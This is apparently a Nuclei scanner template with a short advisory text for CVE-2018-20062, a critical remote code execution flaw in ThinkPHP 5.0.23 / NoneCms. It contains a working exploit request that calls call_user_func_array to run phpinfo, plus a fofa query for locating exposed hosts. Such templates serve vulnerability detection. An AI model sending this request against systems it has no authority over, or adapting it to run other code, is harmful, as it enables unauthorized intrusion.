An issue was discovered in NoneCms V1.3. thinkphp/library/think/App.php allows remote attackers to execute arbitrary PHP code via crafted use of the filter parameter, as demonstrated by the s=index/\think\Request/input&filter=phpinfo&data=1 query string.
PoC代码[已公开]
id: CVE-2018-20062
info:
name: ThinkPHP 5.0.23 - Remote Code Execution
author: dr_set
severity: critical
description: |
An issue was discovered in NoneCms V1.3. thinkphp/library/think/App.php allows remote attackers to execute arbitrary PHP code via crafted use of the filter parameter, as demonstrated by the s=index/\think\Request/input&filter=phpinfo&data=1 query string.
reference:
- https://github.com/yilin1203/CVE-2018-20062/blob/main/CVE-2018-20062.py
- https://github.com/yilin1203/CVE-2018-20062
- https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rce
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-20062
epss-score: 0.94306
epss-percentile: 0.99939
cpe: cpe:2.3:a:5none:nonecms:1.3.0:*:*:*:*:*:*:*
metadata:
vendor: 5none
product: nonecms
fofa-query: app="ThinkPHP"
verified: true
max-request: 1
tags: cve,cve2018,kev,thinkphp,rce
http:
- method: GET
path:
- "{{BaseURL}}?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1"
matchers-condition: and
matchers:
- type: word
words:
- "PHP Extension"
- "PHP Version"
- "ThinkPHP"
condition: and
- type: status
status:
- 200
# digest: 4a0a0047304502205db93c55de93bdd0d9c96a45404a028eee243cc4f2231cd2b44408882bbab9260221009b0818c4b6b9210b2d0331b56aed76409abbdc7553089bba706422ae3b0b8504:922c64590222798bb761d5b6d8e72950